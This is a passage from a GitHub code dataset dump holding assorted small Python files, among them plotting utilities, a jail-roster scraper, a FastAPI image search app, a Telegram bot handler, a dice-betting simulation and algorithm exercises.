y = np.linspace(start + (y_i*length), stop + (y_i*length),100)\n sigma_y = Sigma_y[y_i, y_i]\n mu_y += (y_i)*length\n X, Y = np.meshgrid(x, y)\n pos = np.empty(X.shape + (2,))\n pos[:, :, 0] = X\n pos[:, :, 1] = Y\n rv = multivariate_normal([mu_x, mu_y], [[sigma_x, 0], [0, sigma_y]])\n ax.plot_surface(X, Y, rv.pdf(pos),cmap='viridis',linewidth=0)\n ax.hold()\n\n ax.set_xlabel('X axis')\n ax.set_ylabel('Y axis')\n ax.set_zlabel('Z axis')\n plt.show()\n\ndef plot_1d_norm_dist_1(mu, sigma, show=True):\n x = np.linspace(mu-3*sigma, mu+3*sigma, 100)\n plt.figure()\n plt.plot(x, norm.pdf(x, mu, sigma))\n if show:\n plt.show()\n\ndef plot_1d_norm_dist_n(Mu, Sigma, show=True):\n fig = plt.figure()\n canvas = FigureCanvas(fig)\n ax = fig.add_subplot(111)\n ax.set_ylim(0,40)\n ax.set_xlim(-3,3)\n for i, mu in enumerate(Mu):\n sigma = Sigma[i, i]\n # length = (3*sigma)*2\n # mu += (i*length)\n x = np.linspace(mu-3*sigma, mu+3*sigma, 100)\n ax.plot(x, norm.pdf(x, mu, sigma))\n if show:\n plt.show()\n canvas.draw()\n width, height = fig.get_size_inches() * fig.get_dpi()\n width = int(width)\n height = int(height)\n info_dict = {\"canvas\": canvas, \"height\": height, \"width\":width}\n return info_dict\n\nif __name__ == '__main__':\n num_features = 10\n Mu_w = np.zeros(num_features)\n Sigma_w = np.eye(num_features) * 1e-1\n plot_1d_norm_dist_1(Mu_w[0], Sigma_w[0, 0])\n plot_1d_norm_dist_n(Mu_w, Sigma_w)\n plot_3D_multi_norm_dist_1(Mu_w, Sigma_w)\n plot_3D_multi_norm_dist_n(Mu_w, Mu_w, Sigma_w,Sigma_w)\n\n","repo_name":"yun-long/rl_prototype","sub_path":"rl/misc/norm_dist_plot.py","file_name":"norm_dist_plot.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17438813361","text":"class Business:\n def __init__(self,id,business_type,name,appointment_time,country,city,code,street,house_nr,email,phone,id_owner):\n self.id=id\n self.business_type = business_type\n self.name=name\n self.appointment_time=appointment_time\n self.country=country\n self.city=city\n self.code=code\n self.street=street\n self.house_nr=house_nr\n self.email=email\n self.phone=phone\n 
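# Assumption (inferred from the commented-out payload sketches below): id_owner\n        # holds the id of the owner record that created this business.\n        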
self.id_owner=id_owner\n\n# {\n# \"business_type\" : \"\",\n# \"name\" : \"\",\n# \"appointment_time\" : \"\",\n# \"country\" : \"\",\n# \"city\" : \"\",\n# \"code\" : \"\",\n# \"street\": \"\",\n# \"house_nr\": \"\",\n# \"email\" : \"\",\n# \"phone\" : \"\",\n# \"id_owner\" : \"\"\n# }\n# {\n# \"firstname\" : \"\",\n# \"lastname\" : \"\",\n# \"date_of_birth\" : \"\",\n# \"email\" : \"\",\n# \"phone\" : \"\"\n# }","repo_name":"Nabil-Lahssini/Final_Dev_Sprint-1","sub_path":"python/api/src/Entity/business.py","file_name":"business.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30429732714","text":"import os, sys\nfrom os.path import exists, join\nfrom coot import *\n\nuse_gui_qm = False #coot_utils requires this variable to be defined\n\n#search the Python path for coot_utils\nfor curpath in sys.path:\n abspath = join(curpath, \"coot_utils.py\")\n if exists(abspath):\n #when we find it, exec it\n \n #but first exec redefine_functions.py if it's in the same directory\n #redefine_functions.py renames func_py() to func(), which used to be done in coot_utils.py itself\n #new versions of coot_utils.py requires this renaming to be done before being exec'ed\n redefAbspath = join(curpath, \"redefine_functions.py\")\n if exists(redefAbspath):\n execfile(redefAbspath)\n \n execfile(abspath)\n break\n","repo_name":"pemsley/coot","sub_path":"rcrane/coot_utils_adapter.py","file_name":"coot_utils_adapter.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"34"} +{"seq_id":"17516785795","text":"########## STEP 1: Import your libraries! ##########\n\nimport csv\nimport requests, mechanize\nfrom bs4 import BeautifulSoup\n\ncsvfile = open('jail.csv', 'a')\njail_writer = csv.writer(csvfile)\n\n########## STEP 2: Get the HTML! ##########\n\nurl = 'https://report.boonecountymo.org/mrcjava/servlet/RMS01_MP.I00030s?max_rows=500'\n\nbr = mechanize.Browser()\nbr.open(url)\nhtml = br.response().read()\n\n########## STEP 3: Make soup! 
##########\n\nsoup = BeautifulSoup(html, \"html.parser\")\n\n########## STEP 4: Dig through the HTML ##########\n\nmain_table = soup.find('tbody', {'id': 'mrc_main_table'})\n\nrow_list = main_table.find_all('tr')\n\nfor row in row_list:\n\n td_tags = row.find_all('td')\n\n output = []\n for td in td_tags:\n output.append(td.text.strip())\n\n jail_writer.writerow(output)","repo_name":"cjdd3b/advanced-data-journalism-jailscrape","sub_path":"new-jailscrape.py","file_name":"new-jailscrape.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"34312424910","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nfrom dataReader import dataReader\nfrom utils import flow2motion\n\n_temp = __import__(\"flownet2-pytorch.utils.flow_utils\", globals(), locals(), ['flow2img', 'readFlow'], 0)\nflow2img = _temp.flow2img\nreadFlow = _temp.readFlow\n\n\n\npath = '../Desktop/Dataset/Change Detection Dataset/dataset2014/dataset/PTZ/intermittentPan/'\n\ndr = dataReader()\nfiles = dr.readFiles(str(path)+'input', \".jpg\")\ngroundTruthFiles = dr.readFiles(str(path)+'groundtruth', \".png\")\nflowFiles = dr.readFiles(path+'flow', 'flo')\n\nmcdResults = dr.readFiles(str(path)+'mcdMask', \".jpg\")\nmcdFlowResults = dr.readFiles(path+'mcdFlowMask', 'jpg')\nflowFiles = dr.readFiles(path+'flow', 'flo') \n\n\nidx = 1623 #1830 #851\n\nimg = cv2.imread(files[idx])\nheight, width, _ = img.shape\n\ngt = cv2.imread(groundTruthFiles[idx])\n\nmcd = cv2.imread(mcdResults[idx], 0)\nmcdFlow = cv2.imread(mcdFlowResults[idx])\n\nflow = readFlow(flowFiles[idx-8])\nflowImg = flow2img(flow)\nmag, motion = flow2motion(flow)\n\n\nout = mcd\nchangeBgMean = np.mean(mag[out==0])\nchangeFgMean = np.mean(mag[out>0])\n\nprint(\"backgroung mean change of magnitude: %.3f FG: %.3f\" %(changeBgMean, changeFgMean))\nmeanMotionFlow = np.mean(mag[motion>0])\nprint(\"mean of motion detected from Flow: \", meanMotionFlow)\n\ncv2.imshow(\"img\", img)\ncv2.imshow(\"gt\", gt)\ncv2.imshow(\"mcd\", mcd)\ncv2.imshow(\"mag\", mcdFlow)\ncv2.imshow(\"motion from flow\", flowImg)\n\n\nfig, axarr = plt.subplots(1,6)\n\naxarr[0].imshow(img)\naxarr[0].axis('off')\naxarr[0].set_title('Input')\n\naxarr[1].imshow(gt, cmap='gray')\naxarr[1].axis('off')\naxarr[1].set_title('Ground truth')\n\naxarr[2].imshow(mcd, cmap='gray')\naxarr[2].axis('off')\naxarr[2].set_title('fastMCD')\n\naxarr[3].imshow(mag, cmap='gray')\naxarr[3].axis('off')\naxarr[3].set_title('Flow magnitude')\n\naxarr[4].imshow(motion, cmap='gray')\naxarr[4].axis('off')\naxarr[4].set_title('Magnitude Otsu threshold')\n\nif (meanMotionFlow - changeBgMean) < 10:\n print(\"flow motion result can not be trusted!!\")\n motion[:] = 0\n\naxarr[5].imshow(motion, cmap='gray')\naxarr[5].axis('off')\naxarr[5].set_title('M(flow)')\n\nplt.show()\n\n\ncv2.waitKey(0)\n\n","repo_name":"irfan7787/motion-detection","sub_path":"show-mag-mcd.py","file_name":"show-mag-mcd.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6748901402","text":"s = input()\nk = input()\n\nstart = 0\ntime = 0\nfor _ in range(len(s)):\n start = s.find(k,start)\n if start == -1:\n break\n end = start + len(k) - 1\n print(f'({start}, {end})')\n\n start += 1\n time += 1\n\nif start == -1 and time ==0:\n print(\"(-1, -1)\")\n \n\n\"\"\"\nSample Input\n\naaadaa\naa\nSample Output\n\n(0, 1) \n(1, 2)\n(4, 
5)\n\"\"\"\n","repo_name":"mdshahadothosen2001/cp","sub_path":"A Hacker Rank/hackerrank_py/51.start-end-find.py","file_name":"51.start-end-find.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40158913820","text":"import sys\nimport shutil\nfrom fastapi import FastAPI, Form, Request, File, UploadFile\nimport uvicorn\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport time\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nimport pickle\nfrom sklearn.neighbors import NearestNeighbors\n\n\nsys.path.append('source')\nfrom IR_models.textbased import *\nfrom IR_models.contentbased import *\n\napp = FastAPI()\napp.mount('/static', StaticFiles(directory='source/static'), name='static')\ntemplates = Jinja2Templates(directory='source/views')\n\n# text\nID_CORPUS, CORPUS = pickle.load(open('source/corpus', 'rb'))\nVECTOR_DOC = vectorizer.fit_transform(CORPUS)\n\n# content\nFILENAME_LIST, IMG_CORPUS = pickle.load(open('source/corpus_img', 'rb'))\nknn = NearestNeighbors(n_neighbors=10, metric='euclidean')\nknn.fit(IMG_CORPUS)\n\n@app.get('/index.html', response_class=HTMLResponse)\ndef index(request: Request):\n context = {'request': request}\n return templates.TemplateResponse('index.html', context)\n\n@app.get('/contentbased.html', response_class=HTMLResponse)\ndef index(request: Request):\n context = {'request': request}\n return templates.TemplateResponse('contentbased.html', context)\n\n\n@app.post('/text-based_query')\nasync def IR_textbased(request: Request, query: str = Form(...)):\n start = time.time()\n vector_query = preprocessing_query(query)\n similar = cosine_similarity(VECTOR_DOC, vector_query).flatten()\n related_docs_indices = similar.argsort()[:-(10+1):-1]\n \n related_img_name = []\n for _, id in enumerate(related_docs_indices):\n img_name = str(ID_CORPUS[id]) + '.png'\n img_path = os.path.join('/img/', img_name)\n related_img_name.append(img_path)\n # show_img_retrieved(related_docs_indices, ID_CORPUS)\n stop = time.time()\n running_time = f'{round((stop - start) * 1000)} ms'\n\n output = {'query': query, 'running_time': running_time, 'image_name': related_img_name}\n return templates.TemplateResponse('index.html', {'request': request,'output': output})\n\n\n@app.post('/content-based_query')\nasync def IR_contentbased(request: Request, file: UploadFile = File(...)):\n dir_query = 'source/static/img_query'\n for f in os.listdir(dir_query):\n os.remove(os.path.join(dir_query, f))\n if file:\n query_location = f'source/static/img_query/{file.filename}'\n with open(query_location, \"wb\") as buffer:\n shutil.copyfileobj(file.file, buffer)\n start = time.time()\n feature_query = []\n feature_query.append(extract_feature(query_location))\n feature_query = np.array(feature_query)\n knn.fit(IMG_CORPUS)\n indices = knn.kneighbors(feature_query, return_distance=False)\n related_img_name = []\n for i in indices[0]:\n img_path = os.path.join('/img/', FILENAME_LIST[i])\n related_img_name.append(img_path)\n stop = time.time()\n running_time = f'{round((stop - start) * 1000)} ms'\n query_path = query_location[13:]\n output = {'query_path': query_path, 'running_time': running_time, 'image_name': related_img_name}\n \n return templates.TemplateResponse('contentbased.html', {'request': request, 'output': output})\n\nif __name__ == \"__main__\":\n 
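# uvicorn.run also accepts explicit host/port overrides if needed, e.g.\n    # uvicorn.run(app, host=\"127.0.0.1\", port=8000)  # hypothetical local dev settings\n    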
uvicorn.run(app)","repo_name":"thanhthanhthile/image-retrieval","sub_path":"source/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}\n+{"seq_id":"38516442858","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n\nimport random\nimport queue\nimport time\nimport threading\n\nmoney_list = []\ncount_dict = {1: 0,\n              2: 0,\n              3: 0,\n              4: 0,\n              5: 0,\n              6: 0,\n              7: 0,\n              }\nq = queue.Queue(10)\n\ndef kaijiang(a, b, c):\n    if a == b == c:\n        # print('aaaaa')\n        # print(a, b, c, 'triple')\n        # baozi += 1\n        count_dict[7] += 1\n        return 7\n    else:\n        if a + b + c < 11:\n            # da += 1\n            return 1\n        else:\n            #\n            return 0\n\n\ndef zhuang():\n    flag = True\n    while True:\n        if q.full():\n            # print('full')\n            # time.sleep(0.5)\n            pass\n        else:\n            # print('rolled the dice once')\n            a = random.randrange(1, 7)\n            b = random.randrange(1, 7)\n            c = random.randrange(1, 7)\n            d = [a, b, c]\n            q.put(d)\n            count_dict[a] += 1\n\n\ndef xian():\n    i = 0  # loop counter\n    da = 0  # count of big outcomes\n    xiao = 0  # count of small outcomes\n    baozi = 0  # count of triples\n    money = 10000  # starting money\n    tingshou = 12000  # stop-win threshold\n    number = 10000  # total number of rounds\n    m = 100  # base bet per round\n    n = 1  # current doubling multiplier\n    y = 0  # 0 = small, 1 = big, 7 = triple\n    while i < number:\n        # print(str(i).center(30, '-'))\n        x, y = divmod(i, 2)\n        # print(x, y)\n        # time.sleep(1)\n        if money <= 0:\n            print('Total', i, 'rounds, lost all the money')\n            break\n        elif money > tingshou:\n            print('Total', i, 'rounds, profit:', money)\n            return 1\n        else:\n            date = q.get()\n\n            a = date[0]\n            b = date[1]\n            c = date[2]\n            # print(a, b, c)\n            # place the bet\n            t_money = m * n\n            if t_money > money:\n                print('Not enough money to bet')\n                print('Total', i, 'rounds, profit:', money)\n                break\n            # print('bet:', t_money)\n\n            money -= t_money\n            # print('remaining:', money)\n            result = kaijiang(a, b, c)\n            # tally big/small results\n            if result == 0:\n                xiao += 1\n            elif result == 1:\n                da += 1\n\n            elif result == 7:\n                baozi += 1\n            else:\n                print('err')\n            # settle the bet\n            if y == result:\n                money += (t_money*2)\n                n = 1\n                # print('won', t_money)\n            else:\n                # n *= 2\n                if n >= 32:\n                    n = 1\n                else:\n                    n *= 2\n                # print('lost', t_money)\n        i += 1\n        money_list.append(money)\n        # time.sleep(5)\n\n    print('Total rounds:', i)\n    print('Big:', '%.2f%%' % (da*100/i))\n    print('Small:', '%.2f%%' % (xiao*100/i))\n    print('Triple:', '%.2f%%' % (baozi*100/i))\n    print(i,xiao,da,baozi)\n\nif __name__ == '__main__':\n\n    t1 = threading.Thread(target=zhuang,)\n    # t2 = threading.Thread(target=xian, )\n    t1.start()\n    # t2.start()\n    # t2.join()\n    xian()\n    # print(q.qsize())\n    # print(count_dict)\n    print('Peak bankroll:', max(money_list))\n\n\n","repo_name":"topsai/PycharmProjects","sub_path":"骰子/庄家.py","file_name":"庄家.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}\n+{"seq_id":"42213447137","text":"l=[]\nfor i in range(4):\n    t=eval(input(\"Enter the tuple:\"))\n    l.append(t)\nen,on=0,0\nprint()\nfor i in range(4):\n    for j in range(4):\n        if i==0 or i==3 or j==0 or j==3:\n            print(l[i][j],end=\" \")\n            if l[i][j]%2==0:\n                en+=1\n            else:\n                on+=1\n        else:\n            print(\" \",end=\" \")\n    print()\nprint(\"\\nThe number of odd numbers are:\",on)\nprint(\"The number of even numbers are:\",en)\n","repo_name":"PiyushVarman/Class-11-Project-Files","sub_path":"Class XI- Python Programs/Examination Programs/Pre-Annual/Q30.py","file_name":"Q30.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}\n+{"seq_id":"12120376795","text":"\"\"\"\nThe code is a Python script that defines functions and a state machine using the aiogram library,\nwhich is an 
asynchronous framework for building Telegram bots.\nThe functions are used to handle user input and update the bot's state accordingly.\n\"\"\"\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram import types\nfrom ..models import Book\nfrom asgiref.sync import sync_to_async\nTO_CANCEL = 'добавить_книгу добавить_слово все_слова все_книги /контактные_данные /местоположение'\n\n\n@sync_to_async\ndef create_book(name, url, user_id) -> None:\n    \"\"\"Create a new Book object with the given name and URL\"\"\"\n    Book.objects.create(name=name, url=url, user_id=user_id)\n\n\nclass FSMbook(StatesGroup):\n    \"\"\"Defines the states for the state machine used to add a new book\"\"\"\n    name = State()\n    url = State()\n    user_id = State()\n\n\nasync def book_add_start(message: types.Message) -> None:\n    \"\"\"Starts the process of adding a new book\"\"\"\n    await FSMbook.name.set()\n    await message.reply('Введите название книги. \\nДля отмены напишите \"отмена\".', parse_mode='HTML')\n\n\nasync def cancel_add_book(message: types.Message, state: FSMbook) -> None:\n    \"\"\"Cancels the process of adding a new book\"\"\"\n    current_state = await state.get_state()\n    if current_state is None:\n        return\n    await state.finish()\n    await message.reply('Добавление отменено')\n\n\nasync def add_book_name(message: types.Message, state: FSMbook) -> None:\n    \"\"\"Adds the name of the new book\"\"\"\n    if message.text in TO_CANCEL:\n        await message.reply('Ошибка. Вы отправили новую команду.')\n        await cancel_add_book(message, state)\n        return\n    async with state.proxy() as data:\n        data['name'] = message.text\n        data['user_id'] = message.from_user.id\n\n    await FSMbook.next()\n    await message.reply('Введите URL книги. 
\nДля отмены напишите \"отмена\".', parse_mode='HTML')\n\n\nasync def add_book_url(message: types.Message, state: FSMbook) -> None:\n    \"\"\"Adds the URL of the new book\"\"\"\n    async with state.proxy() as data:\n        data['url'] = message.text\n\n    async with state.proxy() as data:\n        await create_book(data['name'], data['url'], data['user_id'])\n        await message.answer(text='Книга добавлена!')\n    await state.finish()\n\n\ndef register_add_book(dp: Dispatcher) -> None:\n    \"\"\"Registers the handlers for adding a new book\"\"\"\n    # dp.register_message_handler(book_add_start, commands=['add_book'], state=None)\n    dp.register_message_handler(book_add_start, state='*', commands='добавить_книгу')\n    dp.register_message_handler(book_add_start, Text(equals='добавить_книгу', ignore_case=True), state=\"*\")\n    dp.register_message_handler(cancel_add_book, state='*', commands='отмена')\n    dp.register_message_handler(cancel_add_book, Text(equals='отмена', ignore_case=True), state=\"*\")\n    dp.register_message_handler(add_book_name, state=FSMbook.name)\n    dp.register_message_handler(add_book_url, state=FSMbook.url)\n","repo_name":"Neki4ar1/bot","sub_path":"Socrat/Socrat/handlers/add_book.py","file_name":"add_book.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}\n+{"seq_id":"12068349413","text":"import subprocess\r\nimport neat\r\nfrom agents import run, winner_play, manual_play\r\nfrom plot import plot\r\nfrom visualize_network import draw_net\r\nimport helpers\r\n\r\n\r\ndef ai_selected() -> None:\r\n    config_path = helpers.get_config_path()\r\n    config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet, neat.DefaultStagnation, config_path)\r\n\r\n    if(helpers.check_genome_path()):\r\n        winner_play(helpers.get_genome(helpers.get_genome_path()), config)\r\n    else:\r\n        run(config)\r\n        draw_net(config, helpers.get_genome(helpers.get_genome_path()), filename=helpers.get_network_graph_path(), node_names=helpers.get_node_names())\r\n        plot()\r\n\r\ndef manual_selected() -> None:\r\n    manual_play()\r\n\r\ndef retrain_selected() -> None:\r\n    config_path = helpers.get_config_path()\r\n    config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet, neat.DefaultStagnation, config_path)\r\n\r\n    run(config) \r\n    draw_net(config, helpers.get_genome(helpers.get_genome_path()), filename=helpers.get_network_graph_path(), node_names=helpers.get_node_names())\r\n    plot() \r\n\r\ndef open_network_selected() -> None:\r\n    if helpers.check_network_graph_path():\r\n        path = helpers.get_network_graph_path() + '.pdf'\r\n        proc = subprocess.Popen([path], shell=True)\r\n\r\n        try:\r\n            proc.communicate(timeout=15)\r\n        except subprocess.TimeoutExpired:\r\n            proc.kill()\r\n    else:\r\n        pass\r\n","repo_name":"Sziszka90/DinoAI","sub_path":"menu_selection.py","file_name":"menu_selection.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}\n+{"seq_id":"786112943","text":"\ndef leitura(texto, tempo):\n    if isfloat(tempo):\n        tempo = float(tempo)\n        return [texto, tempo]\n    return [0, 0]\n\ndef isfloat(value):\n    try:\n        float(value)\n        return True\n    except ValueError:\n        return False\n\nasync def saida(vc):\n    try:\n        await vc.disconnect()\n    except Exception as e:\n        print(e)\n\ndef create_command_json(command_name : str, duration) -> str:\n    \"\"\"\n    Creates a 'query' to insert into 
firebase\n\n Parameters\n ----------\n - command_name -> str\n * name of the command to be recorded\n - duration -> either int or float (doesn't matter)\n * duration of the command in seconds\n \"\"\"\n return(f\"\"\"{{\\n\\t\"{command_name}\":\\n\\t{{\\n\\t\\t\"Duration\": {duration}\\n\\t}}\\n}}\"\"\")","repo_name":"CaricaturiJosias/Discord_bot","sub_path":"bot_suite/tools/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29143727101","text":"from datetime import datetime, timedelta, timezone\nfrom opentelemetry import trace\n\nfrom lib.db import db\nimport logging\n\n# get root logger\nhome_logger = logging.getLogger('app') \n\ntracer = trace.get_tracer(\"home.activities\")\n\nclass HomeActivities:\n def run(cognito_user_id=None):\n home_logger.info('message from INSIDE home activities module')\n with tracer.start_as_current_span(\"home-activites-mock-data\"):\n now = datetime.now(timezone.utc).astimezone()\n span = trace.get_current_span()\n span.set_attribute(\"app.now\", now.isoformat())\n sql = db.template('activities','home')\n results = db.query_array_json(sql)\n span.set_attribute(\"app.result_length\", len(results))\n return results\n","repo_name":"paulegg1/aws-bootcamp-cruddur-2023","sub_path":"backend-flask/services/home_activities.py","file_name":"home_activities.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27534157493","text":"from subject import Subject, SubjectCollection\nfrom typing import List\nfrom random import choices\n\nimport pandas as pd\n\nimport numpy as np\nimport pandas as pd\n\nfrom scipy.ndimage.filters import gaussian_filter\n\n\nVERBOSE = True\nLOG = lambda s: print(f\"[AUG] {s}\") if VERBOSE else None\n\n\n\"\"\"\nAugmentation techniques to be used:\n 1. Gaussian filter\n 2. Scale\n 3. Flips\n\n (https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5977656/pdf/2730723.pdf)\n\"\"\"\n\ndef gaussian(image: np.ndarray) -> np.ndarray:\n return image\n\ndef scale(image: np.ndarray) -> np.ndarray:\n return image\n\ndef flip(image: np.ndarray) -> np.ndarray:\n return image\n\n\nOP_LIST = (\n gaussian,\n scale,\n flip\n)\n\n\ndef augment(subjects: SubjectCollection, class_balancing = True, count_multiplier = 1.0) -> List[np.ndarray]:\n \"\"\"\n Augments the `subjects` list.\n\n If `class_balancing` is `True`, the classes will be\n balanced as a first step of augmentation.\n\n `count_multiplier` specifies the amount of new data\n that will be generated by multiplying the initial\n data count.\n\n Note that all subjects that were not augmented\n will remain as a `Nifti2Image`, not a `np.ndarray`.\n This is done in an effort to reduce memory consumption.\n \"\"\"\n\n if class_balancing:\n LOG(\"Balancing classes...\")\n\n subjects = balance_classes(subjects, subjects.metada)\n\n LOG(\"All the subjects that were not augmented will remain as a `Nifti2Image`.\")\n LOG(\"Make sure to call get_data on them or `utils.flatten_subjects` to retrieve the `np.ndarray`.\")\n\n return subjects\n\n\ndef balance_classes(subjects: SubjectCollection, metadata: pd.DataFrame) -> List[np.ndarray]:\n (s_count, c_count) = group_count(metadata)\n\n LOG(f\"Initial (schz, control): {s_count}, {c_count}\")\n\n if s_count == c_count:\n # classes are balanced\n LOG(\"Classes are already balanced. 
Aborting balancing.\")\n\n return subjects\n\n delta = abs(s_count - c_count)\n op_map = operation_map(delta)\n\n diagnosis = 'CONTROL' if s_count > c_count else 'SCHZ'\n\n LOG(f\"Generating {delta} more {diagnosis}\")\n \n sample = [subj for subj in subjects.subjects if subj.diagnosis == diagnosis]\n sample = choices(sample, k=delta)\n\n # From now on, we will use raw data only\n subjects = [subj.load_anat('space-MNI152NLin2009cAsym_preproc') for subj in subjects.subjects]\n\n for i in range(0, delta):\n operation = op_map[i]\n\n image = sample[i].load_anat('space-MNI152NLin2009cAsym_preproc').get_data()\n image = OP_LIST[operation](image)\n\n sample[i] = image\n\n return subjects + sample\n \n\ndef operation_map(length: int) -> np.ndarray:\n \"\"\"\n Generates a operation map with length `length`.\n\n A operation map is a integer array where each\n number (0, 1, 2) represents a different operation.\n\n This map is randomly ordered and uniformly distributed.\n \"\"\"\n\n return np.random.randint(0, 3, length, dtype=np.int8)\n\n\ndef group_count(metadata: pd.DataFrame) -> (int, int):\n \"\"\"\n Returns the counts of schizophrenics and controls\n in the given subjects `metadata`.\n \"\"\"\n\n schz = metadata[metadata['diagnosis'] == 'SCHZ']\n control = metadata[metadata['diagnosis'] == 'CONTROL']\n\n return (len(schz), len(control))","repo_name":"naccib/projects","sub_path":"preprocessing.old/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17087262771","text":"class Solution:\n def climbStairs(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n list = [1, 2];\n for i in range(2, n, 1):\n list.append(list[i - 2] + list[i - 1]);\n return list[n - 1];\n ","repo_name":"yychuyu/LeetCode","sub_path":"problems/0070_Climbing_Stairs/linlijia.py","file_name":"linlijia.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"34"} +{"seq_id":"1547159546","text":"def sort_n(arr):\n # when we store all sorted elements\n new_arr = []\n\n # taking the \"min & max & mid\" in array \"with\" thier \"indexes\"\n min = {\"value\": 0, \"index\": 0}\n mid = {\"value\": 0, \"index\": 0}\n max = {\"value\": 0, \"index\": 0}\n\n # loop over all \"one by one\"\n for i in range(len(arr)):\n\n # when we start\n if i == 0:\n # set element 0 in array as min\n min[\"index\"] = i\n min[\"value\"] = arr[i]\n\n # set element 0 in array as mid\n mid[\"index\"] = i\n mid[\"value\"] = arr[i]\n\n # set element 0 in array as max\n max[\"index\"] = i\n max[\"value\"] = arr[i]\n\n # append first one direct to the new array\n new_arr.append(arr[i])\n\n # in case element smaller or equal min\n elif arr[i] <= min[\"value\"]:\n\n # insert new min at position 0\n new_arr.insert(min[\"index\"], arr[i])\n\n # set new min\n min[\"value\"] = arr[i]\n # update max position\n max[\"index\"] += 1\n # max[\"index\"] = new_arr.index(max[\"value\"])\n\n # in case element bigger or equal max\n elif arr[i] >= max[\"value\"]:\n # push new max in \"new array\"\n new_arr.insert(max[\"index\"]+1, arr[i])\n\n # set new max\n max[\"index\"] += 1\n # max[\"index\"] = new_arr.index(arr[i])\n max[\"value\"] = arr[i]\n\n # in case element between min & max\n else:\n # in case mid in 0\n if mid[\"index\"] == 0:\n\n # insert element at position => (max - (min / 2) )\n new_arr.insert(int(max[\"index\"] - (min[\"index\"]/2)), 
arr[i])\n\n                # set new mid\n                mid[\"index\"] = i\n                mid[\"value\"] = arr[i]\n\n                # update max position\n                max[\"index\"] += 1\n                # max[\"index\"] = new_arr.index(max[\"value\"])\n\n            # in case mid is less than or equal to the element\n            elif mid[\"value\"] <= arr[i]:\n\n                # insert in new array in mid position\n                new_arr.insert(mid[\"index\"], arr[i])\n\n                # update max position\n                max[\"index\"] += 1\n                # max[\"index\"] = new_arr.index(max[\"value\"])\n\n            # in case mid is greater than or equal to the element\n            elif mid[\"value\"] >= arr[i]:\n\n                # insert at (index + 1) position\n                new_arr.insert(mid[\"index\"]+1, arr[i])\n\n                # update max position\n                max[\"index\"] += 1\n                # max[\"index\"] = new_arr.index(max[\"value\"])\n\n    # return sorted array\n    return new_arr\n\n\narr = [100, 7, 4, 5, 3, 13, 2, 1]\n\nprint(\"== output ==\")\nprint(sort_n(arr))\n","repo_name":"mohammed412/problem-solving","sub_path":"try_sort_o(n).py","file_name":"try_sort_o(n).py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}\n+{"seq_id":"16462816888","text":"first_string = input().split(', ')\nsecond_string = input().split(', ')\n\nsubstrings = []\n\nfor string in first_string:\n    for word in second_string:\n        if string in word:\n            substrings.append(string)\n            break\n\nprint(substrings)\n\n# OR ------------------------------\n\n\ndef substrings_check(first_str, second_str):\n    substrings = []\n\n    for string in first_str:\n        for word in second_str:\n            if string in word:\n                substrings.append(string)\n                break\n    return substrings\n\n\nfirst_string = input().split(', ')\nsecond_string = input().split(', ')\nprint(substrings_check(first_string, second_string))\n\n# OR --------------------------------------------------------------\n\nfirst_string = input().split(', ')\nsecond_string = input().split(', ')\n\nsubstrings = [first_word for first_word in first_string if any(first_word in second_word for second_word in second_string)]\n\nprint(substrings)","repo_name":"Mikeeyh/softuni_fundamentales_exercices","sub_path":"exercices_5_lists_advanced/which_are_in.py","file_name":"which_are_in.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}\n+{"seq_id":"29655157975","text":"#!/usr/bin/python3\n\"\"\"\nModule - 100-matrix_mul\n\n\"\"\"\n\n\ndef matrix_mul(m_a, m_b):\n    if type(m_b) is not 